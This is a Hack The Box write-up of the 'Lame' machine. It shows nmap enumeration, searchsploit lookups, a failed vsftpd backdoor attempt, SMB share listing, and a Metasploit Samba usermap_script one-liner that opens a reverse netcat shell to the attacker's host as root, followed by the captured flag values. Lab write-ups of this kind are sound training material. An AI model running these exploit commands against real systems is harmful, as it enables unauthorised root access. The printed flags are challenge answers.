Eui Chul Chung

Vulnerability Researcher
PEN: OSCP, OSEP, OSCE3
WEB: OSWA, OSWE
EXP: OSED


Categories:

Tags:
Area of Interest:
Categories:
Vulnerabilities:



About

Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Enumeration

Running the script portscan.sh reveals 3 available attack vectors, FTP, SSH and SMB.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ sudo portscan.sh 10.129.66.233

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ cat PortScan\(10.129.66.233\)

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open              Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m27s, deviation: 2h49m45s, median: 25s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-09-01T15:39:06-04:00

Exploitation

FTP

I’ll first check if the FTP service running can be exploited. searchsploit-prettify.py reveals that vsftpd 2.3.4 is vulnerable to vsftpd 2.3.4 - Backdoor Command Execution.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ searchsploit-prettify.py 'vsftpd 2.3.4'
 -------------------------------------------------------- ----------------------------------------------------
| Exploit Title                                          | Path                                               |
 -------------------------------------------------------- ----------------------------------------------------
| vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | /usr/share/exploitdb/exploits/unix/remote/17491.rb |
| vsftpd 2.3.4 - Backdoor Command Execution              | /usr/share/exploitdb/exploits/unix/remote/49757.py |
 -------------------------------------------------------- ----------------------------------------------------

However, exploitation using the Metasploit module failed due to an unknown reason.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 10.129.66.233; set RPORT 21; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to cmd/unix/interact
RHOSTS => 10.129.66.233
RPORT => 21
[*] 10.129.66.233:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.66.233:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

SMB

Next, I’ll be checking the SMB service. With smbmap, I’m able to find that there is a share tmp which has read and write permission enabled for guest accounts.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ smbmap -H 10.129.66.233
[+] IP: 10.129.66.233:445	Name: 10.129.66.233
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

Using an empty username and password, I’m able to enumerate through the share tmp, but there doesn’t seem to be anything interesting.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ smbclient //10.129.66.233/tmp -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep  1 15:55:42 2023
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  .ICE-unix                          DH        0  Fri Sep  1 15:31:06 2023
  vmware-root                        DR        0  Fri Sep  1 15:32:29 2023
  5588.jsvc_up                        R        0  Fri Sep  1 15:32:19 2023
  .X11-unix                          DH        0  Fri Sep  1 15:31:32 2023
  .X0-lock                           HR       11  Fri Sep  1 15:31:32 2023
  vgauthsvclog.txt.0                  R     1600  Fri Sep  1 15:31:03 2023

		7282168 blocks of size 1024. 5385856 blocks available

Since I’ve identified the SMB service Samba smbd 3.0.20-Debian in the enumeration phase, I’ll once again run searchsploit to check if there are any known vulnerabilities. From the search result, I’m able to find that the service might be vulnerable to Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit).

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ searchsploit-prettify.py 'Samba 3.0.20'
 ---------------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title                                                                    | Path                                                    |
 ---------------------------------------------------------------------------------- ---------------------------------------------------------
| Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                           | /usr/share/exploitdb/exploits/multiple/remote/10095.txt |
| Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | /usr/share/exploitdb/exploits/unix/remote/16320.rb      |
| Samba < 3.0.20 - Remote Heap Overflow                                            | /usr/share/exploitdb/exploits/linux/remote/7701.txt     |
| Samba < 3.6.2 (x86) - Denial of Service (PoC)                                    | /usr/share/exploitdb/exploits/linux_x86/dos/36741.py    |
 ---------------------------------------------------------------------------------- ---------------------------------------------------------

By executing the Metasploit module found, I’m able to gain a shell as the user root.

┌──(m0nk3y@kali)-[~/HTB/Lame]
└─$ msfconsole -q -x 'use exploit/multi/samba/usermap_script; set RHOSTS 10.129.66.233; set RPORT 139; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
RHOSTS => 10.129.66.233
RPORT => 139
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Command shell session 1 opened (10.10.16.9:4444 -> 10.129.66.233:44752) at 2023-09-01 16:02:08 -0400

id
uid=0(root) gid=0(root)

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

cat /home/makis/user.txt
306255bad37d2b72b0b62190df77433f

cat /root/root.txt
0cfaa15d79fc9971a427c3fcc95868da